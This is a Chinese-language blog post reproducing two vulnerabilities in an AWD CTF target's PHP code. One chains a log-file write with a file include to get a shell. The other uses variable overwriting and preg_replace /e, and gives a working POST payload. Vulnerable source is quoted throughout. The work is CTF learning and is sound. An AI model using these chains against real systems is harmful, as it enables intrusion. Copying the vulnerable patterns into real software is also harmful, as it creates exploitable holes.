<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="前言之前周六参加了一下天汉的AWD。一开始第一个靶机有点bug，一直连不上，后来有事就离开了，现在再来复现一下。 问师傅要了一下WP，然后在自己的VPS上搭了一个来测试，很奇怪，这个貌似和自己之前做的那个靶机不太像。看题解貌似是moxiaoxi师傅写的一个，好了废话不多说啦，开始复现。">
<meta property="og:type" content="article">
<meta property="og:title" content="AWD代码审计(一)">
<meta property="og:url" content="http://example.com/2020/12/25/AWD%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1(%E4%B8%80)/index.html">
<meta property="og:site_name" content="My0n9s&#39;blog">
<meta property="og:description" content="前言之前周六参加了一下天汉的AWD。一开始第一个靶机有点bug，一直连不上，后来有事就离开了，现在再来复现一下。 问师傅要了一下WP，然后在自己的VPS上搭了一个来测试，很奇怪，这个貌似和自己之前做的那个靶机不太像。看题解貌似是moxiaoxi师傅写的一个，好了废话不多说啦，开始复现。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2020/12/25/ciM6Iq7fFGxnvHW.png">
<meta property="og:image" content="https://i.loli.net/2020/12/26/uVfm6SCGByHa3dQ.png">
<meta property="og:image" content="https://i.loli.net/2020/12/26/xuHCDURZI7fOAvy.png">
<meta property="og:image" content="https://i.loli.net/2020/12/26/9tuJxAjRzdXKU1Y.png">
<meta property="article:published_time" content="2020-12-25T15:46:37.000Z">
<meta property="article:modified_time" content="2024-09-08T04:35:20.000Z">
<meta property="article:author" content="My0n9s">
<meta property="article:tag" content="AWD">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/12/25/ciM6Iq7fFGxnvHW.png">


<link rel="canonical" href="http://example.com/2020/12/25/AWD%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1(%E4%B8%80)/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://example.com/2020/12/25/AWD%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1(%E4%B8%80)/","path":"2020/12/25/AWD代码审计(一)/","title":"AWD代码审计(一)"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>AWD代码审计(一) | My0n9s'blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">My0n9s'blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E4%B8%80"><span class="nav-number">1.1.</span> <span class="nav-text">漏洞一</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E4%BA%8C"><span class="nav-number">1.2.</span> <span class="nav-text">漏洞二</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="My0n9s"
      src="/images/touxiang.jpeg">
  <p class="site-author-name" itemprop="name">My0n9s</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">78</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">20</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2020/12/25/AWD%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1(%E4%B8%80)/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang.jpeg">
      <meta itemprop="name" content="My0n9s">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="My0n9s'blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="AWD代码审计(一) | My0n9s'blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          AWD代码审计(一)
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2020-12-25 23:46:37" itemprop="dateCreated datePublished" datetime="2020-12-25T23:46:37+08:00">2020-12-25</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2024-09-08 12:35:20" itemprop="dateModified" datetime="2024-09-08T12:35:20+08:00">2024-09-08</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/AWD/" itemprop="url" rel="index"><span itemprop="name">AWD</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>之前周六参加了一下天汉的AWD。一开始第一个靶机有点bug，一直连不上，后来有事就离开了，现在再来复现一下。</p>
<p>问师傅要了一下WP，然后在自己的VPS上搭了一个来测试，很奇怪，这个貌似和自己之前做的那个靶机不太像。看题解貌似是moxiaoxi师傅写的一个，好了废话不多说啦，开始复现。</p>
<span id="more"></span>

<h2 id="漏洞一"><a href="#漏洞一" class="headerlink" title="漏洞一"></a>漏洞一</h2><p>写文件+文件包含</p>
<p><img src="https://i.loli.net/2020/12/25/ciM6Iq7fFGxnvHW.png" alt="123.png"></p>
<p>可以大致看到这个框架，通过page参数跳转到不同的php文件，然后通过view来渲染。page参数可控。</p>
<p>跟进一下filter函数:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$input</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">return</span> <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;.&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$input</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里将输入的点替换为空，在跟进一下 echoContent函数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">echoContent</span>(<span class="params"><span class="variable">$vId</span>, <span class="variable">$data</span></span>)</span></span><br><span class="line"><span class="function">	</span>&#123;</span><br><span class="line">		<span class="variable language_">$this</span>-&gt;data = <span class="variable">$data</span>;</span><br><span class="line">		<span class="variable">$content</span> = <span class="title function_ invoke__">loadFile</span>(<span class="string">&quot;views/&quot;</span>.<span class="variable">$vId</span>.<span class="string">&quot;.php&quot;</span>);</span><br><span class="line">		<span class="variable">$content</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseHeadAndFoot</span>(<span class="variable">$content</span>);</span><br><span class="line">		<span class="variable">$content</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseVal</span>(<span class="variable">$content</span>);</span><br><span class="line">		<span class="variable">$content</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseIf</span>(<span class="variable">$content</span>);</span><br><span class="line">		<span class="keyword">echo</span> <span class="variable">$content</span>;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>这里vId参数可控，接着跟进 loadFile()函数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">loadFile</span>(<span class="params"><span class="variable">$filePath</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">global</span> <span class="variable">$cfg_basedir</span>;</span><br><span class="line">	<span class="keyword">if</span>(!<span class="title function_ invoke__">file_exists</span>(<span class="variable">$filePath</span>))&#123;</span><br><span class="line">		<span class="title function_ invoke__">write_log</span>(<span class="string">&#x27;Try to open Null file:&#x27;</span>.<span class="variable">$filePath</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$cfg_basedir</span>.<span class="string">&#x27;/error.php&#x27;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="variable">$fp</span> = @<span class="title function_ invoke__">fopen</span>(<span class="variable">$filePath</span>,<span class="string">&#x27;r&#x27;</span>);</span><br><span class="line">	<span class="variable">$sourceString</span> = @<span class="title function_ invoke__">fread</span>(<span class="variable">$fp</span>,<span class="title function_ invoke__">filesize</span>(<span class="variable">$filePath</span>));</span><br><span class="line">	@<span class="title function_ invoke__">fclose</span>(<span class="variable">$fp</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="variable">$sourceString</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>file_path参数可控，且当路径不存在时，会调用 write_log函数，我们继续跟进这个函数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">write_log</span>(<span class="params"><span class="variable">$input</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">global</span> <span class="variable">$cfg_logfile</span>;</span><br><span class="line">    <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$cfg_logfile</span>, <span class="variable">$input</span>, FILE_APPEND);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>input参数可控，我们再来跟进一下这个 全局变量的值，<code>$cfg_logfile = dirname($_SERVER[&#39;SCRIPT_FILENAME&#39;]) . DS. &quot;logs/logfile.php&quot;;</code>   </p>
<p><code>dirname($_SERVER[&#39;SCRIPT_FILENAME&#39;])</code> 返回 web根目录，跟进一下DS，发现：</p>
<p><code>define(&#39;DS&#39;, DIRECTORY_SEPARATOR);</code>   然后跟进一下 DIRECTORY_SEPARATOR ：</p>
<p><code>define (&#39;DIRECTORY_SEPARATOR&#39;, &quot;/&quot;);</code>  所以最后 DS值为 &#x2F; </p>
<p>所以到这里基本可以确定，一步一步分析下来, page参数可控，我们写一个不存在的路径，然后这里会把page内容写入到 &#x2F;var&#x2F;www&#x2F;html&#x2F;html&#x2F;logs&#x2F;logfile.php 里面，如果我们能找到一个有文件包含函数的php文件，就可以实现文件包含，getshell 。</p>
<p>可以看到 action.php 文件：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require_once</span>(<span class="string">&quot;library/common.php&quot;</span>);</span><br><span class="line"><span class="keyword">require_once</span>(<span class="string">&quot;library/view.php&quot;</span>);</span><br><span class="line"><span class="variable">$page</span> = <span class="title function_ invoke__">filter</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;page&#x27;</span>]).<span class="string">&#x27;.php&#x27;</span>;</span><br><span class="line"><span class="variable">$post_data</span> = <span class="keyword">array</span>();</span><br><span class="line"><span class="keyword">foreach</span> (<span class="variable">$_POST</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>) &#123;</span><br><span class="line">	<span class="variable">$post_data</span>[<span class="variable">$key</span>] = <span class="variable">$value</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(<span class="variable">$page</span>))</span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">require_once</span>(<span class="variable">$page</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>存在require_once()函数，所以漏洞利用链就形成了。</p>
<p>一开始在index.php页面写马</p>
<p><img src="https://i.loli.net/2020/12/26/uVfm6SCGByHa3dQ.png" alt="124.png"></p>
<p>然后在action.php页面包含：</p>
<p><img src="https://i.loli.net/2020/12/26/xuHCDURZI7fOAvy.png" alt="125.png"></p>
<p>发现成功getshell</p>
<p>这里一开始没复现成功，后来才发现原来是 logfile.php 没有给写权限，233333.</p>
<h2 id="漏洞二"><a href="#漏洞二" class="headerlink" title="漏洞二"></a>漏洞二</h2><p>变量覆盖+ preg_replace &#x2F;e 执行（&#x2F;e 这个5.5版本以上就废弃了）</p>
<p>我们来看一下 normailz.php代码，重点放在 function.php上：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">action</span>(<span class="params"><span class="variable">$post_data</span>, <span class="variable">$ip_replacement</span>, <span class="variable">$mail_replacement</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">foreach</span> (<span class="variable">$post_data</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>) </span><br><span class="line">    &#123;</span><br><span class="line">        <span class="variable">$$key</span> = <span class="variable">$value</span>;</span><br><span class="line">    &#125;	</span><br><span class="line">	<span class="keyword">try</span></span><br><span class="line">    &#123;</span><br><span class="line">		<span class="keyword">if</span> (<span class="variable">$method</span> == <span class="string">&#x27;/\\d+\\.\\d+\\.\\d+\\.\\d+/&#x27;</span>)</span><br><span class="line">		&#123;</span><br><span class="line">			<span class="variable">$res</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="variable">$method</span>, <span class="variable">$ip_replacement</span>, <span class="variable">$source</span>);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span></span><br><span class="line">			<span class="variable">$res</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="variable">$method</span>, <span class="variable">$mail_replacement</span>, <span class="variable">$source</span>);</span><br><span class="line">		</span><br><span class="line">	 &#125;</span><br><span class="line">	<span class="keyword">catch</span>(<span class="built_in">Exception</span> <span class="variable">$e</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="title function_ invoke__">write_log</span>(<span class="variable">$e</span>-&gt;<span class="title function_ invoke__">getMessage</span>());</span><br><span class="line">		<span class="variable">$res</span>=<span class="variable">$source</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="variable">$res</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里可以看到 <code>$$key=$value</code> 这一行，则很有可能可以实现变量覆盖，我们追溯一下 $post_data变量</p>
<p>发现跳转到  action.php，重点在这几行代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$post_data</span> = <span class="keyword">array</span>();</span><br><span class="line"><span class="keyword">foreach</span> (<span class="variable">$_POST</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>)</span><br><span class="line">&#123;</span><br><span class="line">	<span class="variable">$post_data</span>[<span class="variable">$key</span>] = <span class="variable">$value</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里我们传入post值，会进行键值和对应value的赋值。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span> (<span class="variable">$post_data</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>) </span><br><span class="line">    &#123;</span><br><span class="line">        <span class="variable">$$key</span> = <span class="variable">$value</span>;  <span class="comment">//这里的$key本身对应一个value,然后对应的value又对应一个value，比如 post_data[page]=normailz</span></span><br><span class="line">    &#125;	                 <span class="comment">//即 $key=page 然后 $value=normailz ，然后$$key=$page=$value=normaliz</span></span><br></pre></td></tr></table></figure>

<p>然后结合这个，我们实现变量覆盖，从而实现 method , mail_replacement,source的值 全部可控，然后我们利用 &#x2F;e 这个特性 来执行命令并返回。</p>
<p>我们传入的payload，post传参：</p>
<p><code>page=normailz&amp;method=/a/e&amp;mail_replace=phpinfo()&amp;source=a</code></p>
<p>这里经过第一层 foreach:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$post_data[page]=normailz</span><br><span class="line"></span><br><span class="line">$post_data[method]=/a/e</span><br><span class="line"></span><br><span class="line">$post_data[mail_replacement]=phpinfo()</span><br><span class="line"></span><br><span class="line">$post_data[source]=a</span><br></pre></td></tr></table></figure>

<p>经过第二次foreach:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$page=normailz</span><br><span class="line"></span><br><span class="line">$method=/a/e</span><br><span class="line"></span><br><span class="line">mail_replacement=phpinfo()</span><br><span class="line"></span><br><span class="line">source=a</span><br></pre></td></tr></table></figure>

<p>所以实现了各个参数可控，触发命令执行，复现效果图:</p>
<p><img src="https://i.loli.net/2020/12/26/9tuJxAjRzdXKU1Y.png" alt="111.png"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/AWD/" rel="tag"># AWD</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2020/12/24/buu%E4%B8%A4web/" rel="prev" title="BUU两Web">
                  <i class="fa fa-angle-left"></i> BUU两Web
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/01/10/%E6%96%B0%E5%B9%B4%E6%84%BF%E6%99%AF/" rel="next" title="新年愿景">
                  新年愿景 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">My0n9s</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
